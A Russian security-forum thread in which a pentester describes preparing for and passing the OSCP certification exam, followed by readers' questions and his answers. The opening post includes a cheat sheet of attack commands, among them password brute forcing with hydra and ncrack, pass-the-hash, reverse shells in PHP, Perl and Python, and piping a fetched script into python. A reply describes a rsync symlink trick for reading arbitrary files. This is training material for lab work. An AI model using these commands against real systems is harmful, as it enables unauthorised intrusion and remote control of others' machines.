• Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Как я сдавал OSCP?!

SooLFaa

Platinum
15.07.2016
898
1 560
BIT
30
Привет, мой друг. Вот и я решил черкануть тебе пару строк об уже нашумевшем экзамене OSCP. Думаю, если ты читаешь эту тему, то уже знаешь о чем речь, но на всякий случай, если привел тебя сюда "Random", напомню,
OSCP - Offensive Security Certified Professional, знаменитый международный сертификат по наступательной безопасности, который подтверждает квалификацию пентестера. Его особенность в том, что его нельзя сдать "заучив тесты", только реальная практика пентеста, только хардкор. В этой статье я расскажу о том, как я прошел свой путь.

Чтобы не повторяться приведу тебе полезные ссылки:
Прочитал и готов идти дальше?! - ОК.
Почему то я уверен, раз ты это читаешь, то и ты хочешь войти в ряды OSCP'шников?!

На самом деле OSCP - это сертификат, а сам курс называется PWK (Pentest with Kali Linux). Тебе даются видеоматериалы и PDF. А так же доступ к лаборатории на оплаченный тобой период.
Так же дают уже готовый образ Kali и после оплаты, назначаешь дату, когда готов приступить учиться.

Надеюсь у тебя не составит труда зарегистрироваться.

Прохождение лаборатории...
Вот тебе несколько полезных советов.
1) В OSCP много Rabbit Holes (уязвимости или вектора, которые ведут в никуда)
2) Почти всегда эксплоит не работает из коробки и почти всегда, что то надо поправить. (обычно, это незначительная деталь)
3) Если nmap тебе показал только один порт 22 или 3389 вероятнее всего креды находятся на другой машине (никогда не забывай про POST enum на всех машинах)
4) Тачки из Big4 не такие уж и сложные: Humble, Ghost, Sufference, Pain
5) Не забывай про разрядность машины
6) Помни про WAF, disable functions, bad chars и другое...
7) Запусти nmap -sV -sC -p- -oN res.nmap на всю доступную сеть сразу
8) Почти всегда, если на машине есть gcc, то существует кернел сплоит.
9) Абсолютно овладей техникой передачи файлов, работай консолью cmd,bash и старайся не использовать metasploit.

А вот эти заметочки тебе помогут:
  • Брутилка RDP
ncrack -vv --user <username>-P PASS_FILE.txt rdp://<ip>
  • Брутилка SNMP
hydra -P PASS_FILE.txt -v <ip> snmp
  • Брутилка SSH
hydra -l root -P password-file.txt <ip> ssh
  • Использование Pass-The-Hash через SMB
pth-winexe -U administrator% //<IP> cmd
  • Настройка TFTP для передачи файлов
Сервер
Код:
sudo apt install -y atftpd
sudo sed -e 's/^USE_INETD=true/USE_INETD=false/g' -i /etc/default/atftpd
sudo systemctl enable atftpd
sudo systemctl restart atftpd
Клиент
tftp 10.11.0.243 GET win_32_shell.exe
  • Компиляция эксплоитов, обращай всегда внимание на разрядность машины.
gcc -m32 -Wl,--hash-style=both -o exp exploit.c
  • Reverse connect через php
<?php echo passthru("bash -i >& /dev/tcp/<ip>/443 0>&1"); ?>
  • Reverse connect через perl
use Socket;$i="<ip>";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};
  • Reverse connect через python
Код:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
  • Бывает такое, что нет возможности прокинуть файл, тогда можно выполнить python сценарий через http со своей машины
curl http://<IP>/linuxprivchecker.py | python
  • А если недоступен curl
wget -O - -o /dev/null http://10.11.0.243/linuxprivchecker.py | python
  • TTY Shell - нужен, чтобы получить более интерактивную оболочку, когда сессия получены через nc
python -c ‘import pty; pty.spawn(“/bin/sh”)’
  • Не забывай проверять /etc/fstab
  • sudo -l - всегда проверяй текущие правила sudo
Как ты видишь тут нет хинтов, предлагаю тебе пройти лабораторию самому. Кстати, если ты напишешь отчет как взломал не менее 10 машин, то тебе начислят ещё 5 баллов на экзамене.
Вообщем, путь в лаборатории очень увлекателен и рекомендую тебе пройти его, я, например, решил 53 из 55 машин.

Экзамен:
Итак, самое интересное, экзамен. Ты прошел лабу, получил ссылку и назначил экзамен, я тобой горжусь.
Обязательно купи пару банок энергетика.
В экзамене у тебя будет 5 машин, которые надо взломать за 24 часа.
1 - машина за 10 балов
2 - машины за 20 балов
2 - машины за 25 балов
Причем одна из машин будет на Buffer Over Flow. Не сказать, что она сложная. Просто внимательно изучи материал PDF на эту тему и проблем не будет.

Мой экзамен начался в 12:00. Но рекомендую придти по раньше. За Вами все 24 часа будет следить камера и смотрящему надо провести подготовку с вами. Он попросит осмотреть комнату, запустить скрипты, показать все выходы и входы. На экзамене можно выходить, но надо сообщать проктору.

Как я сдавал экзамен?!
Я сначала запустил nmap на 4 машины на все порты с опцией -sC и -sV, убрал в screen, стал решать бинарщину.
Бинарщина со всеми скринами пала за 30 минут, так как я наизусть её отточил. И вот получен первый флаг.
Следующей поддалась машина за 10 балов, причем, меня удивило, что уязвимость была достаточно свежая. Это говорит о том, что Offensive Security обновляют экзамен. Поэтому будь в тренде и следи за громкими исследованиями. Итого в кармане 35 балов за час. (Минимум для сдачи надо 75)

Следующие два часа я ломал машину за 20. Долго не мог понять, почему не работает эксплоит. Оказалось, что ответ лежал на поверхности. Внес нужные правки в эксплоит и пала машина за 20. Самое интересное тут, что Администратора на машину я взял просто угадав эксплоит. Но воспроизводил и подбирал его вручную, не используя сторонние тулзы. Вникнув полностью в атаку.

Осталась машины за 20 и 25 балов.
Пользователя на машине за 25 я взял тоже достаточно быстро, хотя и пришлось переписать значительную часть эксплоита.
А вот в машине за 20 пришлось попотеть...
Чтобы её взять нужно было связать в единую цепочку несколько уязвимостей, но в итоге поддалась и она.

Сделав все скрины, я отправился на 4 часовой сон....

Прозвенел будильник за 2 часа до конца экзамена. Более менее поспавшей головой я ещё раз взглянул на всё. Подработал скриншоты и завершил экзамен. Далее стал читать требования к отчету и тут отнесись очень внимательно, несоблюдение требований лишит тебя заветного сертификата.

Отчет подготовил за 6 часов и отправил на проверку...
Через 5 дней мне сообщили, что я успешно сдал экзамен и теперь являюсь OSCP.
Это было суперувлекательное путешествие. Проверка на стойкость. OSCP научил не сдаваться и искать решение до конца, смотреть на системы под разными углами.

Наверное, тебе интересно, мой бэкграунд.
1) Я отлично владел кодовой базой и знал все вектора на web.
2) Пол года я играл на HacKTheBox и набил ранг Guru.
3) Я читал много книг по сетям и прикладному "Хакингу".
4) Смотрел WriteUp'ы из CTF'ов и неплохо знал UNIX системы.
5) У меня был значительный опыт проведения пентестов.

OSCP не такой уж и сложный если подойти к вопросу подготовки ответственно. Уверен, что скоро ты расскажешь, как получил свой сертификат. Удачи и Try Harder.

Задавай свои вопросы!
 
Последнее редактирование:

SooLFaa

Platinum
15.07.2016
898
1 560
BIT
30
Английский прям хардовый сильно не требуется.
Список книг:
HAoE (Hacking Art Of Explotation)
CCNA Router And Switching
Компьютерные Сети
Современные операционные системы
 
  • Нравится
Реакции: Shadow User и .Method

clevergod

Platinum
22.04.2017
119
674
BIT
11
Грац! начало статьи не плохое, но вот ряд пунктов порождают новые вопросы:
"Бинарщина со всеми скринами пала за 30 минут, так как я наизусть её отточил" - где, как и чем?
"что уязвимость была достаточно свежая " - примерно намек, это веб сервис или эксплоит типа SMBv3 на который сплоита толком на тот момент еще небыло?
"Оказалось, что ответ лежал на поверхности " - хоть намеком, что именно было так очевидно, если ты потратил много времени?
"Администратора на машину я взял просто угадав эксплоит " - очень любопытно как можно угадать?
"Чтобы её взять нужно было связать в единую цепочку несколько уязвимостей, но в итоге поддалась и она." - вот это очень интересно, хоть в скользь бы посвятил.
ну и на последок "Далее стал читать требования к отчету и тут отнесись очень внимательно, несоблюдение требований лишит тебя заветного сертификата " - какие есть подводные камни?
 
  • Нравится
Реакции: batu5ai

SooLFaa

Platinum
15.07.2016
898
1 560
BIT
30
Грац! начало статьи не плохое, но вот ряд пунктов порождают новые вопросы:
"Бинарщина со всеми скринами пала за 30 минут, так как я наизусть её отточил" - где, как и чем?
"что уязвимость была достаточно свежая " - примерно намек, это веб сервис или эксплоит типа SMBv3 на который сплоита толком на тот момент еще небыло?
"Оказалось, что ответ лежал на поверхности " - хоть намеком, что именно было так очевидно, если ты потратил много времени?
"Администратора на машину я взял просто угадав эксплоит " - очень любопытно как можно угадать?
"Чтобы её взять нужно было связать в единую цепочку несколько уязвимостей, но в итоге поддалась и она." - вот это очень интересно, хоть в скользь бы посвятил.
ну и на последок "Далее стал читать требования к отчету и тут отнесись очень внимательно, несоблюдение требований лишит тебя заветного сертификата " - какие есть подводные камни?
Ща по порядку
1) Методичка pwk давно гуляет по интернету. Я накатил тот же образ из методы. То же самое приложение. И тренировалсяпо пунктам на нем. В самой лабе OSCP будет так же RDP доступ к машине, где можно потренировать будет.
2) Я не могу сообщать детали экзамена и уязвимостей - это приведет к отзыву сертификата. Могу сказать, что в OSCP преимущество архитеркутрные и инфровые баги, но и вебчик встречается часто.
3) У тебя есть машина, на ней определенная OS, ты предполагаешь, что возможно, этот эксплоит подойдет. Но я его не тестировал не чекал, а сразу в бой заводил руками, после некоторых танцев с бубнами он неожиданно дал права админа..
4) Не могу. Это уже будут частности. Просто надо помнить, что иногда симбиоз нескольких баг дает РЦЕ. Например жизненный пример, не из ОСЦП. Когда на машине был включен rsync и на ней же был веб сервер. Rsync синхронил файлы в /var/www/html. Как прочитать произвольный файл за пределами RSYNC? Просто синхронишь symlink на нужный файл и читаешь через вебу symlink.
 
Последнее редактирование:

DeathFaktorFox

One Level
08.09.2019
5
2
BIT
0
Привет, вопрос такой. Я прохожу сейчас PWK 3.0, какая версия была у тебя?
 
  • Нравится
Реакции: f0g

DeathFaktorFox

One Level
08.09.2019
5
2
BIT
0
Все. Но я бы сдал даже если бы не проходил. На экзамене было совсем другое.
PWK 3.0 чуть более современный, чем 2.0. Я довольно долго сидел на 2.0, так как обучение начал с нуля, и довольно далеко продвинулся. В третьей версии довольно удобно сделана проверка хэшей из proof.txt. Каково же было мое удивление, когда я узнал, что более половины ключей уже не проходят, т.к в списке лаб добавилось много новых тачек. Big 4 остался без изменений.
Выделили 3 тренировочные тачки для отработки упражнений, две винды и debian.
Какие бы ты мог дать рекомендации по отчету, помимо тех, что написаны в официальных правилах?
 

SooLFaa

Platinum
15.07.2016
898
1 560
BIT
30
PWK 3.0 чуть более современный, чем 2.0. Я довольно долго сидел на 2.0, так как обучение начал с нуля, и довольно далеко продвинулся. В третьей версии довольно удобно сделана проверка хэшей из proof.txt. Каково же было мое удивление, когда я узнал, что более половины ключей уже не проходят, т.к в списке лаб добавилось много новых тачек. Big 4 остался без изменений.
Выделили 3 тренировочные тачки для отработки упражнений, две винды и debian.
Какие бы ты мог дать рекомендации по отчету, помимо тех, что написаны в официальных правилах?
PWK 3.0 Я уже видел. Ну опять же каких сокральных знаний там нет. Все в пределах того же.

Отчет. Я использовал их шаблон чуток переделав структуру только. Вот как они рекмендуют лучше так и делать. Главное документировать каждый ша. Показывать правки в эксплоите (я просто выделял красным) и давать объяснения зачем они сделаны. Хотя все это есть в требованиях.
 

DeathFaktorFox

One Level
08.09.2019
5
2
BIT
0
PWK 3.0 Я уже видел. Ну опять же каких сокральных знаний там нет. Все в пределах того же.

Отчет. Я использовал их шаблон чуток переделав структуру только. Вот как они рекмендуют лучше так и делать. Главное документировать каждый ша. Показывать правки в эксплоите (я просто выделял красным) и давать объяснения зачем они сделаны. Хотя все это есть в требованиях.
Благодарю) надеюсь, скоро пополню ряды получивших серт)
 
  • Нравится
Реакции: artfox

DeathFaktorFox

One Level
08.09.2019
5
2
BIT
0
Поздравляю ! Подскажи , а как глубоко надо копать в этой теме ?
Именно из-за неё и парюсь с этим экзаменом...
По-мне так по этой теме достаточно подробно разобрано в методичке и видеоматериалах курса pwk
 

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 188
BIT
0
для тех кто хочет облегчить себе жизнь с данным экзаменом:

1)

и мои ресы.)

2 )
 

Ez 25

New member
16.04.2020
3
0
BIT
0
Помогает ли данный сертификат при поиске работы?
 

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 188
BIT
0
Помогает ли данный сертификат при поиске работы?
да, работодатели обращают на это внимание и при собеседовании у тя будет большое преимущество) но я сам нигде не работаю)) парадокс...
 
  • Нравится
Реакции: artfox
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!